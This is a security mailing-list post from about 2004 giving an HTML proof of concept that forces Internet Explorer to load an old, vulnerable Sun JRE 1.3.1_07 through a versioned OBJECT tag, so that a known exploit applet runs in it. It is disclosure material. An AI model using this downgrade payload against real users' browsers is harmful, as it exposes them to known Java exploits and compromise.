<<< Date Index >>>     <<< Thread Index >>>

Java version downgrading proof-of-concept



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


In reference to this:

http://www.securityfocus.com/archive/1/382281/2004-11-23/2004-11-
29/0

<html>
<title> Java Version Downgrade proof-of-concept </title>
<body>
Demonstration uses the following vulnerability:
<br>
http://www.securityfocus.com/bid/8879
<br>
Source code for Simple.class:
<br>
http://www.securityfocus.com/bid/8879/exploit/
<p>
Added this code to Simple.java for debugging purposes:
<br>
String javaVersion = System.getProperty("java.version");
<br>
addItem("Java version: " + javaVersion);
<p>
This proof-of-concept was tested on a Windows system using IE with
the following Java installations:
<br>
Sun JRE 1.3.1_07 (vulnerable to BID 8879)
<br>
Sun JRE 1.3.1_13 (not vulnerable to BID 8879)
<br>
note: invoking applet normally should run Simple.class in JRE
1.3.1_13.
<p>
<OBJECT classid="clsid:CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA"
width = "600" height = "100"
codebase="http://java.sun.com/products/plugin/autodl/jinstall-
1_3_1_07-windows-i586.cab##Version=1_3_1_07">
<PARAM NAME="code" VALUE="Simple.class">
</OBJECT>
</body>
</html>

cheers!


-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkUEARECAAYFAkGnht0ACgkQaPog1qyYGULJYgCcCfLJwRDjM3fv5okud87OyhmoookA
l3lwS0XvR6Zm7jg/ze5wWUkRuDU=
=EE7n
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427